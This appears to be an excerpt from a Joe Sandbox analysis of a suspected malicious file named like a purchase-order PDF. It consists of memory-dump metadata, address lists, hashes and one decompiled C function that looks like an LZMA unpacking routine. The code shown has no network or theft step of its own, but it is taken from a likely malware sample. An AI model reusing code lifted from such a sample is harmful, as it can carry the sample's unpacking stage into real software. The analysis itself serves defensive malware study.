0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406bc0
0x00406bc7
0x00406bcd
0x00406bd3
0x00000000
0x00406bd7
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c0e
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c59
0x00406c5c
0x00406c84
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c76
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
